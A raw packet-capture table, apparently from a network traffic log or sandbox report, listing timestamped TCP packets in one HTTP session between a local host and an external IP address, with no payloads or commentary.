Dec 20, 2024 16:33:10.396316051 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.397152901 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.397156954 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.397193909 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.397349119 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.397391081 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.398216963 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.398256063 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.398307085 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.399343967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.399389982 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.399563074 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.400473118 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.400516987 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.400661945 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.401160002 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.401638031 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.401851892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.401891947 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.402621031 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.402673960 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.402714014 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.403758049 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.403799057 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.404050112 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.404846907 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.404890060 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.539757967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.540085077 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.540179968 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.540400028 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.540566921 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.540620089 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.541393042 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.541886091 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.541956902 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.542546988 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.542560101 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.542601109 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.542635918 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.543654919 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.543706894 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.543983936 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.544640064 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.544691086 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.544828892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.545154095 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.545806885 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.546291113 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.546473026 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.546520948 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.546838999 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.546896935 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.547200918 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.547246933 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.547764063 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.547776937 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.547817945 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.548778057 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.548932076 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.548945904 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.548978090 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.549998999 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.550045967 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.550211906 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.550262928 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.550952911 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.551008940 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.551090956 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.551153898 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.552062035 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.552196026 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.552231073 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.552273035 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.553164005 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.553217888 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.553345919 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.553389072 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.554246902 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.554332018 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.554928064 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.554994106 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.555372000 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.555418015 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.555499077 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.555540085 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.556529999 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.556579113 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.556732893 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.556788921 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.557570934 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.557584047 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.557617903 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.557631016 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.558671951 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.558720112 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.559273005 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.559323072 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.559757948 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.559778929 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.559818983 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.560837984 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.560884953 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.561616898 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.561659098 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.561881065 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.561956882 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.561985016 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.562143087 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.563024044 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.563071012 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.563236952 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.563330889 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.564111948 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.564162970 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.565217018 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.565229893 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.565269947 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.565506935 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.565547943 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.566308975 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.566320896 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.566358089 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.566369057 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.567679882 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.567692041 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.567739964 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.568511963 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.568667889 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.568840981 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.568952084 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.569597960 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.569695950 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.570235968 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.570308924 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.570664883 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.570703983 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.570820093 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.570859909 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.571744919 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.571789980 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.571990967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.572031021 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.572853088 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.572896957 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.573048115 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.573090076 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.574131966 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.574392080 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.574470043 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.575171947 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.575318098 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.575361967 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.576208115 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.576253891 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.576416969 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.577150106 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.577270985 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.577312946 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.577442884 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.577481985 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.578310966 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.578350067 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.578371048 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.578413010 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.579432011 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.579719067 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.579761982 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.580521107 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.580724955 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.580768108 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.581619978 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.581748962 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.581792116 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.582778931 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.582822084 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.583878040 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.583893061 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.583905935 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.583935022 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.583956003 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.584893942 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.585146904 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.586010933 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.586024046 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.586082935 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.586082935 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.586139917 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.587209940 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.587254047 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.587337971 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.588179111 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.588223934 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.588460922 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.589148998 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.589278936 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.589520931 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.589565992 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.590472937 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.590743065 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.590787888 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.591610909 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.591661930 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.591806889 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.592664957 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.592710018 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.593714952 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.593728065 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.593766928 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.593888998 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.593931913 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.594845057 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.595158100 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.595206022 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.595860958 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.596019030 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.596064091 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.596944094 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.596985102 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.746025085 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.746082067 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.746145964 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.746228933 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.746279001 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.746349096 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.746401072 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.747378111 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.747436047 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.747756004 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.747946978 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.748002052 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.748868942 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.748927116 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.748974085 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.749023914 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.749970913 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.750027895 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.750052929 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.750253916 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.751104116 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.751348972 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.751415014 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.751466036 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.752187014 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.752234936 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.752299070 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.752350092 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.753324032 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.753384113 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.753617048 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.753741026 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.754421949 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.754547119 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.754612923 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.754709005 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.755502939 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.755670071 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.755739927 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.755739927 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.757013083 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.757060051 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.757180929 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.757235050 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.757682085 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.757733107 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.757814884 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.757868052 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.758862019 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.758908033 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.759119987 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.759176016 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.759864092 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.759897947 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.759916067 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.759943962 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.760910988 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.760963917 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.761059999 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.761109114 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.762054920 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.762105942 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.762177944 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.762422085 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.763129950 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.763176918 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.763278961 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.763422966 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.764209986 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.764260054 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.764452934 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.764503956 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.765355110 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.765403986 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.765820980 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.765877962 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.766429901 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.766514063 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.767508984 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.767544031 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.767560959 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.767592907 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.767635107 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.767695904 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.768593073 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.768646955 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.769010067 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.769058943 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.769689083 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.769742012 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.770534039 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.770621061 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.770838022 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.770873070 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.770940065 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.771922112 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.771975994 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.772121906 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.772197962 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.772941113 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.773144007 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.774111986 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.774147034 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.774183035 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.774198055 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.774230003 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.775348902 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.775398970 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.775713921 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.775760889 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.776254892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.776304960 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.776388884 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.776437044 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.777369976 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.777424097 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.777476072 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.778506994 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.778667927 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.778718948 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.779527903 CET	80	49881	185.156.73.23	192.168.2.6
